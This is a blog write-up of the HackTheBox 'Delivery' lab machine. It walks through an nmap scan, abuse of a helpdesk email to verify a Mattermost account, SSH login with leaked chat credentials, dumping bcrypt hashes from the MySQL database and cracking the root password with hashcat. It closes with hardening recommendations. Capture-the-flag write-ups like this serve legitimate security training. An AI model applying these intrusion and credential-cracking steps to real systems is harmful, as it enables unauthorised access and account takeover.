d3vyce/blog
1
0
Fork 0
Code Issues 1 Pull Requests Actions Packages Projects Releases Wiki Activity
blog/content/writeup-ctf/writeup-delivery-htb/index.md
d3vyce 095a13b2c9
Some checks failed
Build Blog Docker Image / build docker (push) Failing after 1m11s
Details
add: writeup-ctf
2024-03-02 21:49:07 +01:00

170 lines
13 KiB
Markdown
Raw Blame History

---
title: "Writeup - Delivery (HTB)"
date: 2022-03-27
slug: "writeup-delivery-htb"
type: "writeup-ctf"
---
This is a writeup for the [Delivery](https://app.hackthebox.com/machines/Delivery) machine from the HackTheBox site.
## Enumeration
First, let's start with a scan of our target with the following command:
```bash
nmap -sV 10.10.11.146
```
Three TCP ports are discovered:
![](img/image-1.webp)
- 22/tcp : SSH port (OpenSSH 7.9p1)
- 80/tcp : HTTP web server (nginx 1.14.2)
- 8065/tcp : ????
![](img/image-2.webp)
## Exploit
After checking the site, I quickly found the `helpdesk` section. It is a site that allows the sending of tickets to support.
![](img/image-3.webp)
I first try to create an account, but it's impossible, I need the validation of an admin to confirm the account. Then I try to create a ticket:
![](img/image-4.webp)
I then go to view it using my email and my ticket number, I arrive on the following page:
![](img/image-5.webp)
In parallel I go to visit the third open port and I find the following page:
![](img/image-6.webp)
I try to create an account, but the site asks me to validate the account via email. I first try to use a temporary email, but I get no confirmation. Then I notice that when I create a helpdesk ticket, it is indicated that I can send emails to the address `3998604@delivery.htb` to add additional information to the ticket. So I use this address when creating the account and when validating I go back to the ticket site and find the following message:
![](img/image-7.webp)
I can now validate my account and log in. I get the following page:
![](img/image-8.webp)
After a little exploration I came across this discussion:
![](img/image-9.webp)
There is a login/password let's try to use it to connect in SSH:
![](img/image-10.webp)
Ok I now have a shell in `maildeliverer` time and I can get the first flag.
## Privilege escalation
I know that the chat application is `mattermost` and that the configuration files for this application are in the `/opt/mattermost`folder. So I start to inspect these files. I find the config file where there are credentials for the access to the database:
```bash
"SqlSettings": {
"DriverName": "mysql",
"DataSource": "mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTi$
"DataSourceReplicas": [],
"DataSourceSearchReplicas": [],
"MaxIdleConns": 20,
"ConnMaxLifetimeMilliseconds": 3600000,
"MaxOpenConns": 300,
"Trace": false,
"AtRestEncryptKey": "n5uax3d4f919obtsp1pw1k5xetq1enez",
"QueryTimeout": 30,
"DisableDatabaseSearch": false
},
```
I connect with the following command:
```bash
mysql -u mmuser -p Crack_The_MM_Admin_PW -D mattermost
```
I first list the tables:
```bash
MariaDB [mattermost]> show TABLES;
+------------------------+
| Tables_in_mattermost |
+------------------------+
| Audits |
| Bots |
| ChannelMemberHistory |
[...]
| Threads |
| Tokens |
| UploadSessions |
| UserAccessTokens |
| UserGroups |
| UserTermsOfService |
| Users |
+------------------------+
```
Then I display the data of the Users `Users` :
```bash
MariaDB [mattermost]> SELECT * FROM Users;
+----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+
| Id | CreateAt | UpdateAt | DeleteAt | Username | Password | AuthData | AuthService | Email | EmailVerified | Nickname | FirstName | LastName | Position | Roles | AllowMarketing | Props | NotifyProps | LastPasswordUpdate | LastPictureUpdate | FailedAttempts | Locale | Timezone | MfaActive | MfaSecret |
+----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+
| 64nq8nue7pyhpgwm99a949mwya | 1608992663714 | 1608992663731 | 0 | surveybot | | NULL | | surveybot@localhost | 0 | | Surveybot | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1608992663714 | 1608992663731 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| 6akd5cxuhfgrbny81nj55au4za | 1609844799823 | 1609844799823 | 0 | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | NULL | | 4120849@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844799823 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| 6wkx1ggn63r7f8q1hpzp7t4iiy | 1609844806814 | 1609844806814 | 0 | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | NULL | | 7466068@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844806814 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| 7z9izpo1wfrnddytkm8815wg4w | 1647894531289 | 1647894703010 | 0 | azerty | $2a$10$Dwc/LdQGFD0PdJrmLwD07uTbZE1CfpswRJCMsoGKeJHKtn4/LIPW. | NULL | | 3998604@delivery.htb | 1 | | | | | system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1647894531289 | 0 | 0 | en | {"automaticTimezone":"America/New_York","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 | 0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL | | root@delivery.htb | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 | 0 | en | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| hatotzdacb8mbe95hm4ei8i7ny | 1609844805777 | 1609844805777 | 0 | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | NULL | | 9122359@delivery.htb | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844805777 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| jing8rk6mjdbudcidw6wz94rdy | 1608992663664 | 1608992663664 | 0 | channelexport | | NULL | | channelexport@localhost | 0 | | Channel Export Bot | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1608992663664 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| n9magehhzincig4mm97xyft9sc | 1609844789048 | 1609844800818 | 0 | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | NULL | | 5056505@delivery.htb | 1 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844789048 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
+----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+--------------------------------------------------------------------------------------------+-----------+-----------+
8 rows in set (0.000 sec)
```
In this table I find the hash of the user, I recover it and launch `hashcat` to crack it:
```bash
hashcat.exe -m 3200 hash.txt pass.txt -r rules/best64.rule
hashcat (v6.2.5) starting
[...]
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
[...]
Dictionary cache hit:
* Filename..: pass.txt
* Passwords.: 1
* Bytes.....: 17
* Keyspace..: 77
$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21
[...]
```
💡To save time I switched to Windows to take advantage of the power of my GPU. Depending on your configuration, it can take more or less time.I find the `PleaseSubscribe!21` password so I can now change the user to root and get the last flag.
![](img/image-11.webp)
## Recommendations
To patch this host I think it would be necessary to perform a number of actions:
- Disable account creation on Matermost
- Do not send a clear password in conversations
- Do not use the root password on other services/for other users
- Use complex passwords
Reference in New Issue View Git Blame Copy Permalink